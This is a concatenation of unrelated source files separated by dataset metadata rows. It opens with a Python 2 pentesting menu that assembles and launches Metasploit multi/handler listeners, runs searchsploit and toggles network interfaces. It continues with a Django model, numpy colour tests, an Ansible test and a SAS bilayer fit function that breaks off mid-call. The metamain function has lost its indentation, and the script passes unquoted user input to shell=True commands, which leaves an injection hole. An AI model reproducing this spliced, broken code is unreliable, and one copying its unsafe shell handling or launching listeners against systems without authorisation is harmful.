def listener():
    """Interactively assemble and launch an msfconsole listener command.

    Collects exploit, payload and host/port options from the user, builds a
    single ``msfconsole -x "..."`` command string and executes it.

    Python 2 code (``print`` statements, ``raw_input``). Depends on module
    globals ``bcolors``, ``name``, ``length_name`` and sibling functions
    ``banner``, ``payload_listener`` and ``metamain``.
    """
    while 1:
        os.system('clear')
        os.system('clear')  # cleared twice throughout this file (house style)
        banner(name,length_name)
        print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to the exploit module... "+ bcolors.ENDC
        # Everything appended after -x runs as msfconsole commands; the
        # trailing quote is added once all options are gathered.
        command ="msfconsole -x \" "
        exploit = "multi/handler "
        choice = raw_input(bcolors.HEADER+"\n[*] Please enter the exploit name only if you know the full path else use the 'search' option once redirected to the metasploit framework... \n"+bcolors.ENDC+"\n1) Keep exploit option blank\n2) Proceed with "+exploit+"\n3) Specify exploit"+"\n4) Return to previous menu"+bcolors.HEADER+"\n\n[*] Please select an option: "+bcolors.ENDC)
        if choice == '1':
            exploit = ""
        elif choice == '2':
            exploit = exploit
            command = command + "use "+ exploit +";"
        elif choice == '3':
            exploit = raw_input(bcolors.HEADER+"\n[*] Please enter the exploit name correctly along with path: "+bcolors.ENDC)
            command = command + "use "+ exploit +";"
        elif choice == '4':
            metamain()
        else:
            print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
            gt = raw_input(bcolors.HEADER+"\n[*] Press any key to reselect..."+ bcolors.ENDC)
            # NOTE(review): retries via recursion rather than looping; deep
            # retry chains grow the call stack.
            listener()
        # Each non-empty answer below is appended as a msfconsole "set" directive.
        lhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host if required (LHOST) or press 'Enter' to continue': "+bcolors.ENDC)
        if lhost!= "":
            command = command + "set LHOST " + lhost + ";"
        lport = raw_input( bcolors.HEADER+"\n[*] Please provide the Local Host if required (LPORT) or press 'Enter' to continue': "+bcolors.ENDC)
        if lport!= "":
            command = command + "set LPORT " + lport + ";"
        rhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Remote Host if required (RHOST) or press 'Enter' to continue': "+bcolors.ENDC)
        if rhost!= "":
            # Sets both RHOST and RHOSTS since the option name varies by module.
            command = command + "set RHOST " + rhost + ";" + "set RHOSTS "+rhost+";"
        rport = raw_input( bcolors.HEADER+"\n[*] Please provide the Remote Port to connect to if required (RPORT) or press 'Enter' to continue': "+bcolors.ENDC)
        if rport!= "":
            command = command + "set RPORT " + rport + ";"
        srvhost = raw_input( bcolors.HEADER+"\n[*] Please provide the Server Host Address if required (SRVHOST) or press 'Enter' to continue': "+bcolors.ENDC)
        if srvhost!= "":
            command = command + "set SRVHOST " + srvhost + ";"
        srvport = raw_input( bcolors.HEADER+"\n[*] Please provide the Server Port if required (SRVPORT) or press 'Enter' to continue': "+bcolors.ENDC)
        if srvport!= "":
            command = command + "set SRVPORT " + srvport + ";"
        choice = raw_input( bcolors.HEADER+"\n[*] Press 'Y' or 'y' if you require a payload or press 'Enter' to continue' : "+bcolors.ENDC)
        if choice == 'Y' or choice == 'y':
            # Delegates payload selection to the interactive payload menu.
            payload = payload_listener()
            command = command + "set payload "+payload+";"
        else:
            payload = ""
        command = command + "\""  # close the quoted -x argument
        # Summary of everything selected so far, for user confirmation.
        print bcolors.HEADER+bcolors.BOLD+ "\n[*] Your options till now:"+bcolors.ENDC+bcolors.HEADER+"\n\n[+] Exploit: "+bcolors.ENDC+exploit+bcolors.HEADER+"\n[+] Payload: "+bcolors.ENDC+payload+bcolors.HEADER+"\n[+] LHOST: "+bcolors.ENDC+lhost+bcolors.HEADER+"\n[+] LPORT: "+bcolors.ENDC+lport+bcolors.HEADER+"\n[+] RHOST: "+bcolors.ENDC+rhost+bcolors.HEADER+"\n[+] RPORT: "+bcolors.ENDC+rport+bcolors.HEADER+"\n[+] SRVHOST: "+bcolors.ENDC+srvhost+bcolors.HEADER+"\n[+] SRVPORT: "+bcolors.ENDC+srvport
        get = raw_input(bcolors.HEADER+"\n\n[*] Press any key to proceed or 'b' to reset options: "+ bcolors.ENDC)
        if get == 'b' or get == 'B':
            continue  # restart the whole option-gathering loop from scratch
        else:
            break
    print "\n"
    print bcolors.HEADER + bcolors.BOLD+"\n[*] Please Wait ...\n" +bcolors.ENDC
    # Hands the terminal over to msfconsole with the assembled command.
    os.system(command)
def searchexploit():
    """Prompt for a keyword, run ``searchsploit`` on it and print the output.

    'b'/'B' searches again; any other key returns to the Metasploit menu.
    Python 2 code; depends on globals ``bcolors`` and sibling ``Command``,
    ``banner`` and ``metamain``.
    """
    os.system('clear')
    os.system('clear')
    name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
    length_name = len(name)
    banner(name,length_name)
    print bcolors.HEADER + bcolors.BOLD+"\n\n[+] Welcome to Search exploit module.... "+ bcolors.ENDC
    keyword = raw_input(bcolors.HEADER+"\n\n[*] Enter keyword to search exploit: "+ bcolors.ENDC)
    # Shells out to exploit-db's searchsploit; keyword is passed unquoted.
    com = Command("searchsploit "+keyword).run()
    print "\n"+com.output
    get = raw_input(bcolors.HEADER+"\n\n[*] Press any key to return or 'b' to search again: "+ bcolors.ENDC)
    if get == 'b' or get == 'B':
        # NOTE(review): retry is implemented as recursion, not a loop.
        searchexploit()
    else:
        metamain()
# main function
def metamain():
os.system('clear')
os.system('clear')
global name
global length_name
os.system('clear')
os.system('clear')
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to Metasploit\n"+ bcolors.ENDC
while True:
os.system('clear')
os.system('clear')
banner(name,length_name)
print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome to Metasploit... \n"+ bcolors.ENDC
print bcolors.HEADER + bcolors.BOLD+"[*] Choose your scan type: "+ bcolors.ENDC
mychoice=raw_input("\n1) Create payload with msfvenom\n2) Create Listener\n3) Update Metasploit\n4) Find exploit \n5) Return to previous menu\n\n"+bcolors.HEADER + bcolors.BOLD+"[*] Choose your option : "+bcolors.ENDC)
mylist=[]
mylist = mychoice.split(',')
if len(mylist)==1:
choice = mylist[0]
if int(choice) == 1:
createpayload()
elif int(choice) == 2:
listener()
elif int(choice) ==3:
os.system('clear')
os.system('clear')
name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
length_name = len(name)
banner(name,length_name)
print "\n"
os.system("apt install metasploit-framework")
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
print "\n"
elif int(choice)==4:
searchexploit()
elif int(choice)==5:
options()
else:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Invalid Input !"+ bcolors.ENDC
def update_progress(progress,name):
    """Render a one-line text progress bar on stdout.

    Rewrites the current line with carriage return, so successive calls
    animate in place.

    :param progress: fraction complete in [0, 1]; ints are coerced to float,
        non-numeric values render an error status, out-of-range values are
        clamped (with "Halt..."/"Done :)" statuses).
    :param name: label printed before the bar.
    :returns: None (output goes to ``sys.stdout``).
    """
    barLength = 20  # Modify this to change the length of the progress bar
    status = ""
    if isinstance(progress, int):
        progress = float(progress)
    if not isinstance(progress, float):
        progress = 0.0
        status = "error: progress var must be float\r\n"
    if progress < 0:
        progress = 0.0
        status = "Halt...\r\n"
    if progress >= 1:
        progress = 1.0
        status = "Done :)\r\n"
    block = int(round(barLength*progress))
    # BUGFIX: '{1}' on the raw product printed float artifacts such as
    # "56.99999999999999%"; format the percentage to one decimal place.
    text = "\r"+name+": [{0}] {1:.1f}% {2}".format( "#"*block + "-"*(barLength-block), progress*100, status)
    sys.stdout.write(text)
    sys.stdout.flush()
def interfaces():
    """Detect the wireless and wired interface names and let the user
    confirm or override each one.

    Sets the module globals ``wifi`` and ``eth``. Python 2 code; depends on
    ``Command``, ``update_progress`` and ``bcolors``.
    """
    global wifi
    global eth
    # Cosmetic progress bar; the actual detection below is instantaneous.
    for i in range(101):
        time.sleep(0.005)
        update_progress(i/100.0,"[*] Detecting your hardware interfaces")
    # Takes the first ifconfig entry whose name contains "wl" / "et".
    # NOTE(review): grep "et" may also match unrelated interface names — verify.
    com = Command("ifconfig | grep \"wl\" | cut -d \" \" -f 1").run()
    wifi = com.output.split(':')[0]
    com = Command("ifconfig | grep \"et\" | cut -d \" \" -f 1").run()
    eth = com.output.split(':')[0]
    # Up to 10 attempts to confirm or replace the wireless guess.
    for i in range(0,10):
        response = raw_input("\n[*] Is your wireless interface '"+wifi+"'? (y|n): ")
        if response == 'Y' or response == 'y' or response == 'YES' or response == 'yes' or response == 'Yes':
            wifi=wifi
            break
        elif response == 'N' or response == 'n' or response == 'NO' or response == 'no' or response == 'No':
            wifi=raw_input("\n[*] Enter your wlan interface name as displayed in (ifconfig): ")
            break
        else:
            print bcolors.FAIL+bcolors.BOLD+"\n[-] Error: Wrong response"+bcolors.ENDC
    # Same confirmation dance for the wired interface.
    for i in range(0,10):
        response = raw_input("\n[*] Is your wired interface '"+eth+"'? (y|n): ")
        if response == 'Y' or response == 'y' or response == 'YES' or response == 'yes' or response == 'Yes':
            eth=eth
            break
        elif response == 'N' or response == 'n' or response == 'NO' or response == 'no' or response == 'No':
            eth=raw_input("\n[*] Enter your wired interface name as displayed in (ifconfig): ")
            break
        else:
            print bcolors.FAIL+bcolors.BOLD+"\n[-] Error: Wrong response"+bcolors.ENDC
class Command(object):
    """One-shot wrapper around subprocess for running shell commands.

    ``run()`` executes the stored command, captures stdout, stderr, the
    process id and the exit status on the instance, and returns ``self``
    so calls can be chained (e.g. ``Command("ls").run().output``).
    """
    def __init__(self, command):
        # The command line; executed through the shell by default.
        self.command = command
    def run(self, shell=True):
        import subprocess as sp
        proc = sp.Popen(self.command, stdout=sp.PIPE, stderr=sp.PIPE, shell=shell)
        self.pid = proc.pid
        out, err = proc.communicate()
        self.output = out
        self.error = err
        # Historical attribute name: holds the process exit status.
        self.failed = proc.returncode
        return self
    @property
    def returncode(self):
        """Exit status of the last run, under the conventional name."""
        return self.failed
def viewmac():
    """Print the MAC addresses of the detected wireless and wired interfaces.

    Python 2 code (trailing-comma prints suppress the newline so the MAC
    appears on the same line). Reads globals ``wifi`` and ``eth``; parses
    the "ether" line of ``ifconfig`` output.
    """
    print "\n[+] The MAC of your WLAN interface '"+wifi+"' is:",
    com = Command("ifconfig "+wifi+" | grep ether | cut -d \" \" -f 10").run()
    print com.output
    print "[+] The MAC of your wired interface '"+eth+"' is:",
    com = Command("ifconfig "+eth+" | grep ether | cut -d \" \" -f 10").run()
    print com.output
    return
def options():
    """Main interactive menu: interface up/down, MAC, public IP, NMAP,
    Metasploit, interface re-registration, or exit.

    Loops until the user exits. Python 2 code; reads globals ``wifi`` and
    ``eth`` and calls siblings ``banner``, ``Command``, ``update_progress``,
    ``viewmac``, ``nmapmain``, ``metamain`` and ``main``.
    """
    while 1:
        os.system("clear")
        os.system("clear")
        # Locals here shadow the module-level banner globals of the same name.
        name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
        length_name = len(name)
        banner(name,length_name)
        print bcolors.HEADER + bcolors.BOLD+"\n[+] Welcome ! Please select an option below.... "+ bcolors.ENDC
        choice = raw_input("\n1) Enable "+wifi+"\n2) Disable "+wifi+"\n3) Enable "+eth+"\n4) Disable "+eth+"\n5) View MAC\n6) View Public IP\n7) Run NMAP\n8) Run Metasploit\n9) Re-register interfaces\n10) Exit\n\n"+bcolors.HEADER + bcolors.BOLD+"[+] Enter your choice: "+bcolors.ENDC)
        if choice == '1':
            # Bring the wireless interface up; progress bar is cosmetic.
            com = Command("ifconfig "+wifi+" up").run()
            print bcolors.HEADER+bcolors.BOLD
            for i in range(101):
                time.sleep(0.005)
                update_progress(i/100.0,"[+] Enabling")
            print bcolors.ENDC
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
            os.system('clear')
        elif choice == '2':
            # Take the wireless interface down.
            print bcolors.HEADER+bcolors.BOLD
            com = Command("ifconfig "+wifi+" down").run()
            for i in range(101):
                time.sleep(0.005)
                update_progress(i/100.0,"[+] Disabling")
            print bcolors.ENDC
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
            os.system('clear')
        elif choice == '3':
            # Bring the wired interface up.
            print bcolors.HEADER+bcolors.BOLD
            com = Command("ifconfig "+eth+" up").run()
            for i in range(101):
                time.sleep(0.005)
                update_progress(i/100.0,"[+] Enabling")
            print bcolors.ENDC
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
            os.system('clear')
        elif choice == '4':
            # Take the wired interface down.
            print bcolors.HEADER+bcolors.BOLD
            com = Command("ifconfig "+eth+" down").run()
            for i in range(101):
                time.sleep(0.005)
                update_progress(i/100.0,"[+] Disabling")
            print bcolors.ENDC
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
            os.system('clear')
        elif choice== '5':
            print bcolors.HEADER+bcolors.BOLD
            viewmac()
            print bcolors.ENDC
            get = raw_input(bcolors.HEADER+"[*] Press any key to return..."+ bcolors.ENDC)
            os.system('clear')
        elif choice== '6':
            # Public IP via OpenDNS resolver trick (dig myip.opendns.com).
            print bcolors.HEADER+bcolors.BOLD
            com = Command("dig +short myip.opendns.com @resolver1.opendns.com").run()
            print "\n[+] Your public IP is: "+com.output
            print bcolors.ENDC
            get = raw_input(bcolors.HEADER+"[*] Press any key to return..."+ bcolors.ENDC)
            os.system('clear')
        elif choice== '7':
            print bcolors.HEADER+bcolors.BOLD
            print "\n"
            for i in range(101):
                time.sleep(0.01)
                update_progress(i/100.0,"[+] Loading NMAP")
            print bcolors.ENDC
            nmapmain()
        elif choice== '8':
            print bcolors.HEADER+bcolors.BOLD
            print "\n"
            for i in range(101):
                time.sleep(0.01)
                update_progress(i/100.0,"[+] Loading Metasploit")
            print bcolors.ENDC
            metamain()
        elif choice == '9':
            # NOTE(review): re-enters main() (which calls options() again)
            # instead of returning — menu nesting deepens on each use.
            main()
        elif choice == '10':
            exit()
        else:
            print bcolors.FAIL+bcolors.BOLD+"\n[-] Invalid Input"+bcolors.ENDC
            get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+ bcolors.ENDC)
def main():
    """Program entry: show the banner, detect interfaces, open the menu.

    Sets the module globals ``name`` and ``length_name`` used by the banner
    throughout the tool. Python 2 code.
    """
    global name
    global length_name
    os.system('clear')
    name = " E A S Y P E N T E S T I N G F R A M E W O R K v 1 . 0 "
    length_name = len(name)
    banner(name,length_name)
    print bcolors.HEADER + bcolors.BOLD+"\n[+] Configuring your hardware.... \n\n"+ bcolors.ENDC
    # Detects and registers the wifi/eth globals interactively.
    interfaces()
    print "\n"
    # Cosmetic progress bar before entering the menu loop.
    for i in range(101):
        time.sleep(0.01)
        update_progress(i/100.0,"[*] Registering options")
    os.system('clear')
    options()
# Script entry point: configure interfaces, then drop into the options menu.
if __name__ == '__main__':
    main()
| 41.991803
| 2,274
| 0.663088
| 6,014
| 40,984
| 4.461922
| 0.075324
| 0.072147
| 0.034881
| 0.063502
| 0.754192
| 0.737013
| 0.722926
| 0.713162
| 0.675449
| 0.654878
| 0
| 0.01685
| 0.161551
| 40,984
| 975
| 2,275
| 42.034872
| 0.764049
| 0.0071
| 0
| 0.640788
| 0
| 0.040556
| 0.350754
| 0.096345
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.004635
| null | null | 0.15759
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
96f4c192bb0223616eb8d2cd7e1cb571838fcc50
| 70
|
py
|
Python
|
test_project/test_app/models.py
|
tumb1er/django-admin-countless
|
74ff259ddbaa02fdd39aafe45f5aaefcd8d60887
|
[
"MIT"
] | 2
|
2020-07-29T18:31:55.000Z
|
2021-07-02T13:22:45.000Z
|
test_project/test_app/models.py
|
tumb1er/django-admin-countless
|
74ff259ddbaa02fdd39aafe45f5aaefcd8d60887
|
[
"MIT"
] | 26
|
2020-04-15T09:37:57.000Z
|
2021-12-07T15:28:04.000Z
|
test_project/test_app/models.py
|
tumb1er/django-admin-countless
|
74ff259ddbaa02fdd39aafe45f5aaefcd8d60887
|
[
"MIT"
] | 1
|
2020-03-24T12:17:12.000Z
|
2020-03-24T12:17:12.000Z
|
from django.db import models
class MyModel(models.Model):
pass
| 10
| 28
| 0.728571
| 10
| 70
| 5.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 70
| 6
| 29
| 11.666667
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
8c398ec879f21f7e5d7f311e5dc47bc1ae40e660
| 4,312
|
py
|
Python
|
lace/test_colors.py
|
bodylabs/lace
|
a6ae80787c8c6ba197bd9bad9254b503f4e05c73
|
[
"BSD-2-Clause"
] | 2
|
2020-05-30T10:28:34.000Z
|
2021-02-17T13:47:23.000Z
|
lace/test_colors.py
|
lace/lace
|
a6ae80787c8c6ba197bd9bad9254b503f4e05c73
|
[
"BSD-2-Clause"
] | 11
|
2019-08-29T16:53:29.000Z
|
2021-07-01T06:24:37.000Z
|
lace/test_colors.py
|
metabolize/lace
|
75cee6a118932cd027692d6cfe36b3726b3a4a5c
|
[
"BSD-2-Clause"
] | 5
|
2017-05-09T16:18:16.000Z
|
2018-05-08T16:16:09.000Z
|
import unittest
import numpy as np
from lace.mesh import Mesh
from lace import color
class TestMeshColors(unittest.TestCase):
def setUp(self):
self.colormap = 'jet'
self.jet_0 = np.array([0.0, 0.0, 0.5])
self.jet_1 = np.array([0.5, 0.0, 0.0])
def test_colors_like_with_full_array(self):
c = np.random.rand(10, 3)
v = np.ones((10, 3))
vc = color.colors_like(c, v)
np.testing.assert_array_equal(c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_full_array_transposed(self):
c = np.random.rand(10, 3)
v = np.ones((10, 3))
vc = color.colors_like(c.T, v)
np.testing.assert_array_equal(c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_single_row(self):
c = np.array([[1.0, 0.0, 1.0, 0.0]])
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_single_col(self):
c = np.array([[1.0], [0.0], [1.0], [0.0]])
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_array(self):
c = np.array([1.0, 0.0, 1.0, 0.0])
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_list(self):
c = [1.0, 0.0, 1.0, 0.0]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([self.jet_1, self.jet_0, self.jet_1, self.jet_0])
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_with_name(self):
c = 'red'
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 0.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_rgb_triple_as_array(self):
c = [1.0, 0.0, 1.0]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 1.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_rgb_triple_as_col(self):
c = [[1.0], [0.0], [1.0]]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 1.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_rgb_triple_as_row(self):
c = [[1.0, 0.0, 1.0]]
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
expected_c = np.array([1.0, 0.0, 1.0]) * v
np.testing.assert_array_equal(expected_c, vc)
self.assertEqual(vc.dtype, np.float64)
def test_colors_like_none_or_empty(self):
for c in [None, [], (), np.array([])]:
v = np.ones((4, 3))
vc = color.colors_like(c, v, colormap=self.colormap)
self.assertIsNone(vc)
def test_setting_vc_in_mesh_constructor(self):
m = Mesh(v=np.ones((4, 3)), vc='red')
expected_c = np.array([1.0, 0.0, 0.0]) * m.v
np.testing.assert_array_equal(expected_c, m.vc)
self.assertEqual(m.vc.dtype, np.float64)
def test_scale_vertex_colors(self):
m = Mesh(v=np.ones((4, 3)), vc='red')
m.scale_vertex_colors(np.array([2.0, 1.0, 0.5, 0.0]))
expected_c = np.array([[1.0, 0.0, 0.0], [0.5, 0.0, 0.0], [0.25, 0.0, 0.0], [0.0, 0.0, 0.0]])
np.testing.assert_array_equal(expected_c, m.vc)
self.assertEqual(m.vc.dtype, np.float64)
| 39.925926
| 100
| 0.603664
| 735
| 4,312
| 3.352381
| 0.088435
| 0.051136
| 0.048701
| 0.030844
| 0.861201
| 0.858766
| 0.84862
| 0.832792
| 0.830357
| 0.826299
| 0
| 0.061076
| 0.236781
| 4,312
| 107
| 101
| 40.299065
| 0.687633
| 0
| 0
| 0.591398
| 0
| 0
| 0.002783
| 0
| 0
| 0
| 0
| 0
| 0.268817
| 1
| 0.150538
| false
| 0
| 0.043011
| 0
| 0.204301
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8c39dcc44a9ec5784795c1a5f333c5d3a000aca1
| 96
|
py
|
Python
|
perceptron/utils/symbolic_interval/__init__.py
|
jiayunhan/perceptron-benchmark
|
39958a15e9f8bfa82938a3f81d4f216457744b22
|
[
"Apache-2.0"
] | 107
|
2020-06-15T09:55:11.000Z
|
2020-12-20T11:27:11.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/__init__.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 7
|
2020-06-14T03:00:18.000Z
|
2020-12-07T07:10:10.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/__init__.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 19
|
2020-06-14T08:35:33.000Z
|
2020-12-19T13:43:41.000Z
|
from .interval import Interval, Symbolic_interval
from .symbolic_network import Interval_network
| 48
| 49
| 0.885417
| 12
| 96
| 6.833333
| 0.416667
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 50
| 48
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4fb207d06f889fa7fe07eee6647d5cc56410addc
| 167
|
py
|
Python
|
pool_automation/roles/ansible_bootstrap/molecule/resources/tests/test_default.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 627
|
2017-07-06T12:38:08.000Z
|
2022-03-30T13:18:43.000Z
|
pool_automation/roles/ansible_bootstrap/molecule/resources/tests/test_default.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 580
|
2017-06-29T17:59:57.000Z
|
2022-03-29T21:37:52.000Z
|
pool_automation/roles/ansible_bootstrap/molecule/resources/tests/test_default.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 704
|
2017-06-29T17:45:34.000Z
|
2022-03-30T07:08:58.000Z
|
def test_python_is_installed(host):
assert host.run('python --version').rc == 0
def test_sudo_is_installed(host):
assert host.run('sudo --version').rc == 0
| 20.875
| 47
| 0.694611
| 26
| 167
| 4.230769
| 0.461538
| 0.127273
| 0.272727
| 0.381818
| 0.509091
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0.014085
| 0.149701
| 167
| 7
| 48
| 23.857143
| 0.760563
| 0
| 0
| 0
| 0
| 0
| 0.180723
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4fc8e3c3693e7e0eaf927f62583fe2fe775aeb72
| 14,172
|
py
|
Python
|
src/fffs/sas/bilayer/bilayer.py
|
awacha/fffs
|
6a3ce47c5381ae33fe02909754750ff7f0cf2b8c
|
[
"BSD-3-Clause"
] | null | null | null |
src/fffs/sas/bilayer/bilayer.py
|
awacha/fffs
|
6a3ce47c5381ae33fe02909754750ff7f0cf2b8c
|
[
"BSD-3-Clause"
] | null | null | null |
src/fffs/sas/bilayer/bilayer.py
|
awacha/fffs
|
6a3ce47c5381ae33fe02909754750ff7f0cf2b8c
|
[
"BSD-3-Clause"
] | null | null | null |
from ...core import ModelFunction, ParameterDefinition
from matplotlib.figure import Figure
from matplotlib.axes import Axes
from typing import Union, List, Tuple
import numpy as np
from .gauss_bilayer import ISSVasymm
class GaussianBilayerAsymm(ModelFunction):
category = 'sas'
subcategory = 'bilayer'
name = 'gaussian_bilayer_asymm'
description = 'Fully asymmetric gaussian bilayer'
parameters = [ParameterDefinition('A', 'outer intensity scaling factor', 1, lbound=0),
ParameterDefinition('bg', 'constant background', 0, lbound=0),
ParameterDefinition('R0', 'radius of the innermost bilayer', 40, lbound=0),
ParameterDefinition('dR', 'hwhm of the radius of the innermost bilayer', 5, lbound=0),
ParameterDefinition('rhoGuestIn', 'relative electron density of the inner guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestIn', 'distance of the inner guest molecule layer from the bilayer center',
10, lbound=0),
ParameterDefinition('sigmaGuestIn', 'HWHM of the inner guest molecule layer', 5, lbound=0),
ParameterDefinition('rhoHeadIn', 'relative electron density of the inner headgroup layer (tail is -1)', 1),
ParameterDefinition('zHeadIn', 'distance of the inner headgroup layer from the bilayer center',
2.5, lbound=0),
ParameterDefinition('sigmaHeadIn', 'HWHM of the inner headgroup layer', 5, lbound=0),
ParameterDefinition('sigmaTail', 'HWHM of the tail layer', 1, lbound=0),
ParameterDefinition('rhoHeadOut', 'relative electron density of the outer headgroup layer (tail is -1)', 1),
ParameterDefinition('zHeadOut', 'distance of the outer headgroup layer from the bilayer center',
2.5, lbound=0),
ParameterDefinition('sigmaHeadOut', 'HWHM of the outer headgroup layer', 5, lbound=0),
ParameterDefinition('rhoGuestOut',
'relative electron density of the outer guest molecule layer (tail is -1)', 0),
ParameterDefinition('zGuestOut', 'distance of the outer guest molecule layer from the bilayer center',
10, lbound=0),
ParameterDefinition('sigmaGuestOut', 'HWHM of the outer guest molecule layer', 5, lbound=0),
ParameterDefinition('x_oligolam', 'Proportion of oligolamellarity',0.5,lbound=0, ubound=1),
ParameterDefinition('dbilayer', 'Periodic repeat distance of the bilayers', 6.4, lbound=0),
ParameterDefinition('ddbilayer', 'HWHM of the periodic repeat distance of the bilayers', 0.1, lbound=0),
ParameterDefinition('Nbilayer', 'Number of bilayers', 2, lbound=1, fittable=False, coerce_type=int),
ParameterDefinition('Ndistrib', 'Size distribution integration count', 70, lbound=1, fittable=False, coerce_type=int),
]
def fitfunction(self, x:Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHeadIn, zHeadIn, sigmaHeadIn,
sigmaTail,
rhoHeadOut, zHeadOut, sigmaHeadOut,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return A*x_oligolam*ISSVasymm(x, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
